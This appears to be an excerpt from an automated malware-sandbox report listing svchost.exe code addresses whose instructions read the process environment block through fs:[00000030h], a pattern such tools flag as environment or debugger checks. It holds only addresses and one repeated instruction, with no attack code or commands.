Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]	2_2_03B062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]	2_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]	2_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]	2_2_03B0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]	2_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]	2_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]	2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]	2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]	2_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]	2_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]	2_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]	2_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]	2_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]	2_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]	2_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]	2_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]	2_2_03A280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]	2_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]	2_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]	2_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]	2_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]	2_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]	2_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]	2_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]	2_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]	2_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]	2_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03AE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]	2_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]	2_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]	2_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]	2_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]	2_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]	2_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]	2_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]	2_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]	2_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]	2_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]	2_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]	2_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]	2_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]	2_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]	2_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]	2_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]	2_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]	2_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]	2_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]	2_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]	2_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
